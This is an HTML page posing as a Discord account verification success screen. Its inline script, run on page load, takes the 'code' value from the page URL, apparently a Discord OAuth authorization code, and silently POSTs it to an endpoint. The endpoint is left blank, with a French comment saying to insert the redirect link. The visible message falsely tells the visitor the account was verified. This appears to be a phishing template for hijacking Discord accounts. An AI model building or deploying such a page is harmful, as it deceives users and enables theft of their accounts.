<title>Discord Confirmation</title><link href=https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css rel=stylesheet crossorigin=anonymous><link href=https://logodownload.org/wp-content/uploads/2017/11/discord-logo-4-1.png rel=icon sizes=16x16 type=image/png><meta content=website property=og:type><link href=https://use.typekit.net/joc7wli.css rel=stylesheet>/><div id=box><img id=server_pic src=https://media.discordapp.net/attachments/851389970840944640/851390759998586910/755244169898885160.gif><h2>Discord Account Confirmation</h2><p><p>Your Discord account has been successfully verified, Please check </div><script>window.onload = () => {
			const code = location.href.substring(location.href.indexOf("code")+5, location.href.length)

			if (location.href.indexOf("code") > -1) {
                const req = new XMLHttpRequest()
                req.open("POST", "")//mettre le lien de redirection
                req.send(code)
                req.onload = () => {
                }

			}
		}</script><style>.btn{background-color:#60d1f6;color:#fff;padding:10px 22px}.btn:hover{background:#0076ff;color:#fff}body{background-image:url(https://media.discordapp.net/attachments/851389970840944640/851390664788934656/755243061088616458.gif);background-size:20%;background-repeat:no-repeat;background-position:bottom 0 right 7px;background-color:#24292e!important}h1,h2,h3,h4,h5,h6{color:#fff}p,small,span{color:#eaeaea}#box{width:400px;margin:0 auto;margin-top:100px;border:2px solid #181a1f;vertical-align:middle;border-radius:5px;text-align:center;padding:60px;background-color:#31363f!important}#server_pic{display:block;border-radius:1%;margin:10px auto;width:200px;border:0 solid #181a1f}hr{margin:20px;background-color:#eaeaea}</style>